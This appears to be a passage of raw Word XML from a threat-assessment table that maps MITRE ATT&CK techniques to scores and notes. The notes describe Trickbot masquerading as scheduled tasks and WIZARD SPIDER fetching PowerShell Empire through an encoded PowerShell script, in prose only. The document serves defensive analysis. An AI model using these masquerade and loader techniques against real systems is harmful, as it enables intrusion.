                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E6D742" w14:textId="5763A79F" w:rsidR="004A553D" w:rsidRPr="00957B66" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1036.004 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Masquerading&gt;:Masquerade Task or Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DCB36D" w14:textId="7291A169" w:rsidR="004A553D" w:rsidRDefault="00D4300F" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52DC5322" w14:textId="77777777" w:rsidR="004A553D" w:rsidRPr="00B857D7" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="696E26D3" w14:textId="0C52B3DD" w:rsidR="004A553D" w:rsidRPr="00B857D7" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41D466EF" w14:textId="57CA58C1" w:rsidR="004A553D" w:rsidRPr="00B857D7" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C7DC973" w14:textId="106248B8" w:rsidR="004A553D" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:r>
              <w:t>[2] See below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w14:paraId="106EF375" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EA0E6FC" w14:textId="70DE4817" w:rsidR="000C5B1A" w:rsidRDefault="0056392C" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCA3127" w14:textId="768823BC" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0036593D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0036593D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0036593D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30CC9CAE" w14:textId="77F37D4E" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00957B66">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1053.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00957B66">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34A38E30" w14:textId="246FDD81" w:rsidR="000C5B1A" w:rsidRDefault="0003165D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7468B3D5" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2618E63C" w14:textId="5BCAD457" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01928C27" w14:textId="4D1FF8D1" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E1756EF" w14:textId="0F2A8854" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>Trickbot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve"> is installed as a scheduled task, using names like “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>WinDotNet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>,” “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>GoogleTask</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>,” or “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>Sysnetsf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>” to masquerade as legitimate-appearing processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A600A" w:rsidRPr="00A42CA0" w14:paraId="6480D327" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E691B85" w14:textId="538DC812" w:rsidR="00A42CA0" w:rsidRPr="00A42CA0" w:rsidRDefault="0056392C" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3151A757" w14:textId="466CD54E" w:rsidR="00A42CA0" w:rsidRPr="00A42CA0" w:rsidRDefault="00A42CA0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="248D8F45" w14:textId="1C9AA956" w:rsidR="00A42CA0" w:rsidRPr="00A42CA0" w:rsidRDefault="00A42CA0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A42CA0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A42CA0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A42CA0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65BE1BA9" w14:textId="20207BF3" w:rsidR="00A42CA0" w:rsidRPr="00A42CA0" w:rsidRDefault="00D4300F" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49381B2E" w14:textId="77777777" w:rsidR="00A42CA0" w:rsidRPr="00A42CA0" w:rsidRDefault="00A42CA0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08778610" w14:textId="25118756" w:rsidR="00A42CA0" w:rsidRPr="00A42CA0" w:rsidRDefault="00A42CA0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C5EB8D3" w14:textId="7CBE5D8D" w:rsidR="00A42CA0" w:rsidRPr="00A42CA0" w:rsidRDefault="00A42CA0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08E56C85" w14:textId="309E5E6B" w:rsidR="00A42CA0" w:rsidRPr="00A42CA0" w:rsidRDefault="00A42CA0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A42CA0">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] WIZARD SPIDER uses a module named NewBCtestnDll64 as a reverse SOCKS proxy that allows for the download and installation of the open </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A42CA0">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>source  PowerShell</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A42CA0">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Empire post-exploitation </w:t>
            </w:r>
            <w:r w:rsidRPr="00A42CA0">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>framework. These services launch a Base64-encoded PowerShell script that will fetch the full PowerShell Empire code from a remote IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42CA0" w:rsidRPr="005B41A3" w14:paraId="03B3B399" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CBDB75A" w14:textId="7A99BF86" w:rsidR="00A42CA0" w:rsidRPr="005B41A3" w:rsidRDefault="0056392C" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="652FC28C" w14:textId="765F8173" w:rsidR="00A42CA0" w:rsidRPr="005B41A3" w:rsidRDefault="00A42CA0" w:rsidP="000C5B1A">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964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7447604E" w14:textId="2AE8E491" w:rsidR="00A42CA0" w:rsidRPr="005B41A3" w:rsidRDefault="00A42CA0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009A600A" w:rsidRPr="009A600A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009A600A" w:rsidRPr="009A600A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71467C4E" w14:textId="16777DEA" w:rsidR="00A42CA0" w:rsidRPr="005B41A3" w:rsidRDefault="00C51F59" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="381BB2CC" w14:textId="77777777" w:rsidR="00A42CA0" w:rsidRPr="005B41A3" w:rsidRDefault="00A42CA0" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19A71CB2" w14:textId="511A5833" w:rsidR="00A42CA0" w:rsidRPr="005B41A3" w:rsidRDefault="009A600A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B04914F" w14:textId="2FFDA8FF" w:rsidR="00A42CA0" w:rsidRPr="005B41A3" w:rsidRDefault="009A600A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="394769D4" w14:textId="0FCCF9B2" w:rsidR="00A42CA0" w:rsidRPr="005B41A3" w:rsidRDefault="00A42CA0" w:rsidP="000C5B1A">
            <w:r>
              <w:t>[2] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D17AE" w:rsidRPr="004A553D" w14:paraId="0D8A1B96" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E400412" w14:textId="21D9EDD3" w:rsidR="008D17AE" w:rsidRPr="004A553D" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78E91488" w14:textId="77777777" w:rsidR="008D17AE" w:rsidRPr="004A553D" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">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964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20C59820" w14:textId="77777777" w:rsidR="008D17AE" w:rsidRPr="004A553D" w:rsidRDefault="008D17AE" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
